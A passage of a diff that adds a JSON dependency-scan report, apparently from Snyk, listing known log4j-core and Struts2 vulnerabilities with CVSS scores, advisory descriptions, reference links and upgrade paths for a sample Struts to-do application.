"2.17.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.6, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://logging.apache.org/log4j/2.x/security.html", + "title": "Apache Security Page" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", + "title": "Jira Issue" + }, + { + "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", + "title": "Openwall Mail" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 6.6, + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:47.220633Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:51.766965Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.6, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.472982Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging 
library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", + "epssDetails": { + "percentile": "0.89602", + "probability": "0.02239", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-44832" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2021-12-28T19:42:55.818691Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2021-12-28T19:42:53Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", 
+ "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2021-12-28T20:17:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:58.472982Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.12.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "Marcio Almeida de Macedo" + ], + "semver": { + "vulnerable": [ + "[,2.8.2)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.8.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[,2.8.2)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/server/TcpSocketServer.java", + "className": "TcpSocketServer", + "functionName": "createSerializedSocketServer" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://github.com/pimps/CVE-2017-5645", + "title": "Exploit" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-1863", + "title": "Jira Issue" + }, + { + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5645", + "title": "NVD" + }, + { + "url": 
"https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:27.296331Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.838012Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:08.335550Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:27.296331Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.838012Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.8.2 or higher.\n## References\n- [Exploit](https://github.com/pimps/CVE-2017-5645)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/5dcc19215827db29c993d0305ee2b0d8dd05939d)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-1863)\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2017-5645)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/network/cves/2017/CVE-2017-5645.yaml)\n", + "epssDetails": { + "percentile": "0.98601", + "probability": "0.87384", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-5645" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fxph-q3j8-mv87" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2017-05-17T12:10:22.545000Z", + "functions_new": [ + { + "version": [ + "[,2.8.2)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.server.TcpSocketServer", + "functionName": "createSerializedSocketServer" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-01T21:00:00Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2017-05-21T07:52:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:27.233939Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.8.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "title": "Man-in-the-Middle (MitM)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.13.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.13.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [ + { + "version": [ + "[2.6,2.13.2)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", + "className": "SmtpManager", + "functionName": "getSmtpManager" + } + }, + { + "version": [ + "[2.0-rc2,2.5)" + ], + "functionId": { + "filePath": "org/apache/logging/log4j/core/net/SmtpManager.java", + "className": "SmtpManager", + "functionName": "getSMTPManager" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.logging.log4j:log4j-core", + "references": [ + { + "url": "https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html", + "title": "Atlassian Patch" + }, + { + "url": "https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/LOG4J2-2819", + "title": "Jira Issue" + }, + { + "url": "https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9", + "title": "Reload4j Fix Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "low", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 3.7, + "modificationTime": 
"2024-03-11T09:51:18.869400Z" + }, + { + "assigner": "Red Hat", + "severity": "low", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "cvssV3BaseScore": 3.7, + "modificationTime": "2024-03-11T09:53:58.100685Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-14T11:19:13.272608Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "NVD", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:18.869400Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", + "assigner": "Red Hat", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:58.100685Z" + } + ], + "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Man-in-the-Middle (MitM). Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. 
This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.13.2 or higher.\n## References\n- [Atlassian Patch](https://confluence.atlassian.com/jirakb/list-of-security-vulnerabilities-addressed-in-atlassian-log4j1-1141965553.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/6851b5083ef9610bae320bf07e1f24d2aa08851b)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-2819)\n- [Reload4j Fix Commit](https://github.com/qos-ch/reload4j/commit/90bc7826c206c256ee9ec6b51318cc1865cc19e9)\n", + "epssDetails": { + "percentile": "0.56903", + "probability": "0.00191", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9488" + ], + "CWE": [ + "CWE-297" + ], + "GHSA": [ + "GHSA-vwqq-5vrc-xw9h" + ] + }, + "packageName": "org.apache.logging.log4j:log4j-core", + "proprietary": false, + "creationTime": "2020-04-28T15:10:06.231410Z", + "functions_new": [ + { + "version": [ + "[2.6,2.13.2)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.SmtpManager", + "functionName": "getSmtpManager" + } + }, + { + "version": [ + "[2.0-rc2,2.5)" + ], + "functionId": { + "className": "org.apache.logging.log4j.core.net.SmtpManager", + "functionName": "getSMTPManager" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-04-27T17:16:14Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.logging.log4j", + "artifactId": "log4j-core" + }, + "publicationTime": "2020-04-28T17:16:14Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-14T11:19:13.272608Z", + "socialTrendAlert": false, + 
"severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "upgradePath": [ + false, + "org.apache.logging.log4j:log4j-core@2.13.2" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.logging.log4j:log4j-core", + "version": "2.7" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-1049003", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Alvaro Munoz", + "Masato Anzai" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.26)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.5.26" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-061", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/phil-fly/CVE-2020-17530", + "title": "PoC" + }, + { + "url": "https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html", + "title": "PoC" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:37.704300Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": 
"Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:56.396718Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:37.704300Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The vulnerability exists due to improper input validation when processing certain tag's attributes. The application performs double evaluation of the code if a developer applied forced OGNL evaluation by using the `%{...}` syntax. A remote attacker can send a specially crafted request to the application and execute arbitrary code on the target system.\r\n\r\nSuccessful exploitation of this vulnerability may result in complete compromise of vulnerable system.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.26 or higher.\n## References\n- [Apache Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-061)\n- [GitHub Commit](https://github.com/apache/struts/commit/45667346629455f7ea125bff36bf9b763b7e8463)\n- [PoC](https://github.com/phil-fly/CVE-2020-17530)\n- [PoC](https://videos.hacking.land/2021/03/apache-struts-vulnerability-cve-2020.html)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-17530.yaml)\n", + "epssDetails": { + "percentile": "0.99845", + "probability": "0.97257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-17530" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": 
"org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-12-08T19:30:16.810323Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-12-08T19:25:45Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-12-08T19:25:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.269995Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.26" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "Chris McCown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.5.30)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.5.30" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe", + "title": "GitHub Commit" + }, + { + "url": "https://securitylab.github.com/research/apache-struts-double-evaluation/", + "title": "GitHub Security Lab - Double Evaluation in Struts" + }, + { + "url": 
"https://cwiki.apache.org/confluence/display/WW/S2-062", + "title": "Struts Security Advisory" + }, + { + "url": "https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html", + "title": "Write Up & PoC" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:49:12.874796Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:56.453682Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:12.874796Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE). The fix issued for [CVE-2020-17530](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHESTRUTS-1049003) was incomplete. Some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the `%{...} syntax`. 
Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.30 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b2bfdc5c88a13e82d647e7ae836089a12ce001fe)\n- [GitHub Security Lab - Double Evaluation in Struts](https://securitylab.github.com/research/apache-struts-double-evaluation/)\n- [Struts Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-062)\n- [Write Up & PoC](https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-31805.yaml)\n", + "epssDetails": { + "percentile": "0.96232", + "probability": "0.18558", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2021-31805" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2022-04-12T20:32:06.687703Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-12T20:27:34Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2022-04-12T20:33:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:18.536966Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.30" + ], + "isUpgradable": true, + "isPatchable": false, + "name": 
"org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "title": "Manipulation of Struts' internals", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Viettel Information Security Center" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-026.html", + "title": "Vulnerability Summary" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:56.364720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "description": "## Overview\n`ValueStack` defines special `top` object which represents root of execution context. 
It can be used to manipulate Struts' internals or can be used to affect container's settings.\n\n## References\n- [http://struts.apache.org/docs/s2-026.html](http://struts.apache.org/docs/s2-026.html)\n", + "epssDetails": { + "percentile": "0.70008", + "probability": "0.00305", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5209" + ], + "CWE": [ + "CWE-284" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-07-01T16:51:56Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2015-07-01T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:01.496065Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30207", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Nike Zheng" + ], + "semver": { + "vulnerable": [ + "[2.3.7, 2.3.32)", + "[2.5.0, 2.5.10.1)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.32", + "2.5.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 10, + "functions": [ + { + "version": [ + "[2.3.5, 2.3.32)" + ], + 
